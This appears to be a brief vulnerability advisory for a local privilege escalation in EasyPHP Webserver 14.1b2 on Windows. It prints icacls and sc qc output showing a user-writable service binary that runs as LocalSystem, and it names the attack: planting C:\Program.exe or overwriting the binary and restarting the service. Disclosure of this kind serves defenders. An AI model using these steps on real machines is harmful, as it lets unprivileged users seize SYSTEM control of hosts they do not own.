EasyPHP Webserver version 14.1b2 suffers from a privilege escalation vulnerability.
ac0e7db12787b540f21f069fea597a22a64ff9aa50c249bd597219a1593c91fc
# Exploit Title: [EasyPHP-Webserver Service - Privilege Escalation]
# Date: [date]
# Exploit Author: [Owais Mehtab, Tayeeb Rana]
# Vendor Homepage: [www.easyphp.org/]
# Software Link: [http://www.easyphp.org/easyphp-webserver.php]
# Version: [14.1b2]
# Tested on: [Win7 Sp1]
C:\Program Files (x86)\EasyPHP-Webserver-14.1b2\binaries\httpserver\bin>icacls ews-httpd.exe
ews-httpd.exe BUILTIN\Users:(I)(M)<---
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
C:\>sc qc ews-httpserver
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ews-httpserver
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\EasyPHP-Webserver-14.1b2\binaries\httpserver\bin\ews-httpd.exe -k ru
nservice
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ews-httpserver
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
An attacker may put binary in following locations to run it as localsystem account:-
C:\Program.exe
Or Overwrite the binary and restart service